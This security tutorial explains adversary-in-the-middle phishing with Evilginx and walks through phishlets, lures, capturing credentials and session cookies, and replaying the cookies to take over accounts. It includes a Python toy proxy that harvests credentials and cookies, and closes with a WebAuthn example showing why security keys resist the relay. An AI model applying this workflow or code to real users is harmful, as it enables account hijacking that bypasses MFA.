EvilGinx – how to simulate a Man in the Middle attack?

Phishing has become the most popular attack vector.
Many attackers use a man-in-the-middle (today usually called adversary-in-the-middle) technique: the attacker relays the communication between the user and the server, so the user really is talking to the real service, only through the attacker. This lets the attacker bypass second-factor methods that are not bound to the site's address, such as a code from an authenticator app, an SMS code or any other one-time code, because the victim types the code into the attacker's proxy, which simply forwards it to the real server.

Such attacks can be simulated with publicly available software. One such tool is EvilGinx, written by Kuba Gretzky from the Trójmiasto area.

EvilGinx works as a reverse proxy that carries out the MITM attack and lets the attacker capture not only login credentials but also session cookies. When the user clicks a malicious link, e.g. www.microsoft-falsedomain.pl, Evilginx terminates the victim's TLS connection (it obtains a valid certificate for the phishing domain, so the browser shows the usual padlock) and opens a new connection to the real target server, e.g. microsoft.com. It relays the real site's pages and responses, rewriting the domain name on the way, so the user sees no difference: the login works exactly as it normally does.

Let's move on to practice: how do we prepare a server running Evilginx?

First of all we need a server: a purchased VPS, or a virtual machine in VirtualBox on our own computer for a lab.

The installation is documented here, so I won't duplicate it:
https://help.evilginx.com/docs/getting-started/deployment/remote

The main component is the so-called phishlets: small files with a .yaml extension that describe the site being impersonated (which of its hosts are proxied, which cookies make up a logged-in session, which form fields carry the username and password) and therefore define the page whose link is sent to the victim. You can write your own phishlets, but you can also download ready-made ones, for example from:
https://github.com/ArchonLabs/evilginx2-phishlets/tree/master/phishlets
https://github.com/charlesbel/Evilginx2-Phishlets

We copy the downloaded files into the phishlets directory on the Evilginx server. To use a phishlet we need to set the so-called hostname, the address of the site used for the attack (the phishlets hostname command in the Evilginx console, after the base domain and external IP have been set with the config commands described in the documentation linked above). Next, we enable the phishlet (phishlets enable).

Another component is lures. A lure is the full link that we send to the victim; each lure is created for a specific phishlet. In my case they look like the following.

To obtain the full URL of a lure we use the lures get-url command with the lure's id.

Once the full link is generated, it has to be opened by the victim. Each time the link is accessed, the Evilginx console shows the client details (browser user agent, IP address, time).

When, playing the victim, we log in with our credentials, Evilginx captures the login session: the username and password from the login form and, once the login (including the second factor) completes on the real server, the session cookies.

When we open the session details, in addition to the victim's data we see the contents of the session cookies, which we can use to log into the victim's account from our own computer. Because that session was established with the real server and has already passed the second factor, the cookies alone are enough; no password or code is needed.

To use the captured cookies, copy their content from Evilginx and import it with a cookie-editing browser extension. There are many; I use Cookie-Editor. Paste the content, import it into the browser, then refresh the page, e.g. Office, and we are logged into the victim's account.
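To make the mechanism concrete, here is a toy model of the proxy core, written as an added example for this article; it is not Evilginx code and does not reproduce its phishlet format. It assumes a hypothetical target, example.com, with two hypothetical session cookies, SESSID and AUTH_TOKEN, and reuses the article's phishing domain; the traffic in demo() is constructed. It shows the three things the proxy does on every exchange: rewrite host names in both directions, read the credentials out of the forwarded login POST, and copy the cookies the phishlet names as session tokens into a captured session that can be exported in a JSON shape a cookie-editor extension can import.

```python
"""Toy adversary-in-the-middle proxy core (added example, not Evilginx code).
Target example.com is hypothetical; the phishing domain is the article's own."""
import json
import re
import time
from urllib.parse import parse_qs

PHISH_DOMAIN = "microsoft-falsedomain.pl"
# Simplified stand-in for a phishlet's proxy_hosts / auth_tokens / credentials; not a real file.
PHISHLET = {
    "proxy_hosts": [{"phish_sub": "login", "orig_sub": "login", "domain": "example.com"},
                    {"phish_sub": "www", "orig_sub": "www", "domain": "example.com"}],
    "auth_tokens": [{"domain": ".example.com", "keys": ["SESSID", "AUTH_TOKEN"]}],
    "credentials": {"username": "username", "password": "password"},  # POST field names
}
PHISH_TO_ORIG = {f"{h['phish_sub']}.{PHISH_DOMAIN}": f"{h['orig_sub']}.{h['domain']}"
                 for h in PHISHLET["proxy_hosts"]}
ORIG_TO_PHISH = {orig: phish for phish, orig in PHISH_TO_ORIG.items()}

def swap_hosts(text: str, mapping: dict) -> str:
    for src, dst in mapping.items():
        text = text.replace(src, dst)
    return text

def new_session() -> dict:
    return {"username": None, "password": None, "cookies": {}}

def rewrite_request(headers: dict, body: str, session: dict) -> dict:
    """Victim -> proxy -> real server. TLS is re-terminated, so Host/Origin/Referer
    name the real host; the POST body is read for credentials, then forwarded as-is."""
    out = {k: swap_hosts(v, PHISH_TO_ORIG) if k in ("Host", "Origin", "Referer") else v
           for k, v in headers.items()}
    out.pop("Accept-Encoding", None)  # uncompressed responses can be rewritten
    form = parse_qs(body)
    for field, key in PHISHLET["credentials"].items():
        if key in form:
            session[field] = form[key][0]
    return out

def parse_set_cookie(value: str) -> dict:
    name, _, val = value.split(";")[0].strip().partition("=")
    c = {"name": name, "value": val, "domain": None, "path": "/", "secure": False,
         "httpOnly": False, "expirationDate": None}
    for attr in value.split(";")[1:]:
        k, _, v = attr.strip().partition("=")
        k = k.lower()
        if k in ("domain", "path"):
            c[k] = v.strip()
        elif k in ("secure", "httponly"):
            c["httpOnly" if k == "httponly" else "secure"] = True
        elif k == "max-age":
            c["expirationDate"] = int(time.time()) + int(v)
    return c

def harvest_cookie(set_cookie: str, orig_host: str, session: dict) -> bool:
    """Store a Set-Cookie only if the phishlet lists it as a session token."""
    c = parse_set_cookie(set_cookie)
    c["domain"] = c["domain"] or orig_host  # no Domain attribute: host-only cookie
    dom = c["domain"].lstrip(".")
    for tok in PHISHLET["auth_tokens"]:
        suffix = tok["domain"].lstrip(".")
        if c["name"] in tok["keys"] and (dom == suffix or dom.endswith("." + suffix)):
            session["cookies"][c["name"]] = c
            return True
    return False

def rewrite_response(headers: list, body: str, orig_host: str, session: dict) -> tuple:
    """Real server -> proxy -> victim. Session cookies are captured, then Set-Cookie
    Domain, Location and body links are pointed at the phishing domain."""
    out = []
    for name, value in headers:
        if name.lower() == "set-cookie":
            harvest_cookie(value, orig_host, session)
            value = re.sub(r"(?i)domain=[^;]*", f"Domain=.{PHISH_DOMAIN}", value)
        elif name.lower() == "location":
            value = swap_hosts(value, ORIG_TO_PHISH)
        out.append((name, value))
    return out, swap_hosts(body, ORIG_TO_PHISH)

def session_complete(session: dict) -> bool:
    needed = {k for tok in PHISHLET["auth_tokens"] for k in tok["keys"]}
    return needed <= set(session["cookies"])

def export_cookies(session: dict) -> str:
    """chrome.cookies-style JSON array (assumed import shape for cookie editors)."""
    return json.dumps(list(session["cookies"].values()), indent=2)

def demo() -> dict:
    """Constructed traffic: victim POSTs credentials; real server sets cookies."""
    s = new_session()
    req = {"Host": f"login.{PHISH_DOMAIN}", "Origin": f"https://login.{PHISH_DOMAIN}",
           "Accept-Encoding": "gzip"}
    fwd = rewrite_request(req, "username=victim%40example.com&password=Hunter2", s)
    resp = [("Set-Cookie", "SESSID=abc123; Path=/; Domain=.example.com; Secure; HttpOnly"),
            ("Set-Cookie", "AUTH_TOKEN=xyz789; Path=/; Secure; HttpOnly; Max-Age=3600"),
            ("Set-Cookie", "lang=en; Path=/"),  # not a session token: ignored
            ("Location", "https://www.example.com/home")]
    hdrs, body = rewrite_response(resp, '<a href="https://www.example.com/logout">',
                                  fwd["Host"], s)
    return {"forwarded": fwd, "headers": hdrs, "body": body, "session": s}
```

Note what is absent: nothing in this flow depends on the second factor. The victim types the one-time code into a page served by the proxy, the proxy forwards it, and the real server sets the session cookies after accepting it; the proxy only has to sit in the path.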

As you can see, carrying out such an attack is not difficult, and legacy MFA (app, SMS and one-time codes) does not protect against it, because the proxy relays the code just like the password. Security keys do: with FIDO2/WebAuthn the browser and the key bind the login to the domain actually being visited, so on a phishing domain the key either refuses to respond or the real service rejects the signed response, and the login does not happen. I encourage you to configure 2FA wherever you can, preferably in the form of a security key such as a YubiKey.
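Why a security key breaks this chain, as an added example written for this page rather than taken from the article or from any WebAuthn library. The relying party example.com and its origin are hypothetical, the phishing origin reuses the article's domain, and the authenticator's ECDSA signature is stood in for by an HMAC under a key shared by the simulated key and server so the script runs with the standard library alone; the point is what gets signed, not the signature algorithm. The four scenario functions cover a legitimate login, a relayed login where the browser refuses to talk to the key, one where the proxy rewrites the rpId, and one where it also patches the response on its way to the server.

```python
"""Origin binding in WebAuthn, simplified (added example, not library code).
Relying party example.com is hypothetical; the HMAC stands in for the key's
ECDSA signature purely so the example runs without a crypto library."""
import base64
import hashlib
import hmac
import json
import os

RP_ID = "example.com"
RP_ORIGIN = "https://login.example.com"
PHISH_ORIGIN = "https://login.microsoft-falsedomain.pl"  # the article's phishing domain
_DEVICE_KEY = os.urandom(32)  # stand-in for the credential's private key

def _b64url(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def client_get_assertion(rp_id: str, challenge: bytes, origin: str) -> tuple:
    """Browser + authenticator side. `origin` is where the page really runs: page
    JavaScript cannot choose it and the proxy never sees this browser-internal step."""
    host = origin.split("://", 1)[1].split("/")[0]
    if not (host == rp_id or host.endswith("." + rp_id)):
        raise PermissionError("SecurityError: rpId is not a suffix of the origin")
    client_data = json.dumps({"type": "webauthn.get", "challenge": _b64url(challenge),
                              "origin": origin}, separators=(",", ":")).encode()
    # authenticatorData = rpIdHash || flags (UP) || signCount (simplified)
    auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x01" + (0).to_bytes(4, "big")
    signed = auth_data + hashlib.sha256(client_data).digest()
    return client_data, auth_data, hmac.new(_DEVICE_KEY, signed, hashlib.sha256).digest()

def rp_verify(challenge: bytes, client_data: bytes, auth_data: bytes, sig: bytes) -> str:
    """Relying-party checks: challenge, origin, rpIdHash, then the signature."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get" or cd.get("challenge") != _b64url(challenge):
        return "bad challenge"
    if cd.get("origin") != RP_ORIGIN:
        return "origin mismatch"
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return "rpIdHash mismatch"
    expected = hmac.new(_DEVICE_KEY, auth_data + hashlib.sha256(client_data).digest(),
                        hashlib.sha256).digest()
    return "ok" if hmac.compare_digest(expected, sig) else "bad signature"

def legitimate_login() -> str:
    ch = os.urandom(32)
    return rp_verify(ch, *client_get_assertion(RP_ID, ch, RP_ORIGIN))

def phished_unmodified_rpid() -> str:
    """Proxy relays the real options (rpId=example.com) to the victim's browser."""
    try:
        client_get_assertion(RP_ID, os.urandom(32), PHISH_ORIGIN)
    except PermissionError as e:
        return f"browser refused: {e}"
    return "assertion produced"

def phished_rewritten_rpid() -> str:
    """Proxy rewrites rpId to its own domain, and we generously assume a credential
    exists for it (a real key would have none)."""
    ch = os.urandom(32)
    return rp_verify(ch, *client_get_assertion("microsoft-falsedomain.pl", ch, PHISH_ORIGIN))

def phished_patched_origin() -> str:
    """Proxy additionally patches origin and rpIdHash back to the real values on the
    way to the server; the signature covers SHA-256(clientDataJSON), so it no longer fits."""
    ch = os.urandom(32)
    cd, ad, sig = client_get_assertion("microsoft-falsedomain.pl", ch, PHISH_ORIGIN)
    cd = cd.replace(PHISH_ORIGIN.encode(), RP_ORIGIN.encode())
    ad = hashlib.sha256(RP_ID.encode()).digest() + ad[32:]
    return rp_verify(ch, cd, ad, sig)
```

A real authenticator would not even hold a credential for the rewritten rpId, so the third and fourth scenarios are generous to the attacker; even so, the origin in clientDataJSON and the rpIdHash in authenticatorData are filled in by the browser and covered by the signature, so the relying party rejects the response. That is the property an SMS or app code lacks: the code is just a number, and nothing ties it to the site it was typed into.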
